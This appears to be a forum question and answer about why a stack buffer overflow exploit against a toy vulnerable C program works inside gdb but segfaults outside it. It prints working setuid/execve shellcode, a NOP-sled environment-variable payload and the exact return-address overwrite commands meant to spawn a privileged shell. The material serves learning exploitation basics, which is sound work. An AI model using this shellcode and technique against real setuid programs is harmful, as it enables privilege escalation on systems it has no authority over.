# Buffer overflow misunderstanding

Tags: linux, security, gdb, buffer-overflow

I'm currently trying to understand why one of my methods to exploit a buffer overflow in a program is not working. I tried two solutions, the 1st one works but not the second one. Whereas the 1st method just adds a bunch of NOP where the return address points to.
The program does not contains any stack protections mechanisms.
I'm working on a x86 debian machine (ASLR off), kernel 2.6.32-5-686 with the following vulnerable code:

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void vuln(char *arg)
{
        char msg[12];
        strcpy(msg,arg);
}

int main(int argc, char** argv)
{
    if (argc != 2)
    {
        printf("Usage : prog arg\n");
        exit(1);
    }

    vuln(argv[1]);


    return 0;
}
```

### So, this method is working:

1. EGG will contain 100x NOP and my shellcode

   ```
   export EGG=`python2.6 -c 'print "\x90"*100 + "\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"'`
   ```
2. EGG env variable found at: 0xbffffe10 using "x/200s $esp" in gdb
3. Exploiting the program with:

   ```
   ./a.out `python2.6 -c 'print "\x90"*24 + "\x50\xfe\xff\xbf"'`
   ```

   where I added 0x40 to the EGG address to let EIP points into the NOP heap.

### And this one is NOT working:

1. ```
   export EGG=`python2.6 -c 'print "\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"'`
   ```
2. EGG env variable found at: 0xbffffe75 using "x/200s $esp" in gdb
3. Exploiting the program with:

   ```
   ./a.out `python2.6 -c 'print "\x90"*24 + "\x79\xfe\xff\xbf"'`
   ```

   where I added 0x4 to the EGG var to ignore the address starting at "EGG="

Here the shell spawns into gdb but I'm not suid as I would like to, and outside gdb the program just segfault...
While using into gdb:

```
r `python2.6 -c 'print "\x90"*24 + "AABC"'`
```

I get what I was supposed to get:

```
Cannot access memory at address 0x43424141
0x43424141 in ?? ()
```

So I was in fact erasing the right return address...
What I did wrong? Why gdb spawns a shell and nothing is working outside the debugger?

Comment: I'm not sure that exactly 12 bytes are allocated for `msg`. It may very well be 16 bytes or some other power of two.

Comment: Use the `gdb` debugger to understand what actual addresses are involved. I suspect your overflow goes towards upper call frames (that of `main` or even its caller from `crt0.o`)...

Answer (score 0):

The environment provided by `gdb` is different from when you launch from shell. You need to adjust your addresses:

For example (with ASLR off):

```
$ cat test.c
#include <stdio.h>

int main()
{
    int *i;
    printf("stack var at: %p\n", i);
    printf("env var at: %p\n", (void *)getenv("PATH"));
}
```

Gives:

```
$./test 
stack var at: 0xb7fc7ff4
env var at: 0xbffffebd

$ gdb test
Reading symbols from /home/user/test...(no debugging symbols found)...done.
(gdb) run
Starting program: /home/user/test 
stack var at: 0xb7fc7ff4
env var at: 0xbffffe91
```

Compare, for example, results of `show environment` in `gdb` and `printenv` in shell

Comment: Doesn't the address change only when ASLR is on? Why would the address be different into and outside of gdb?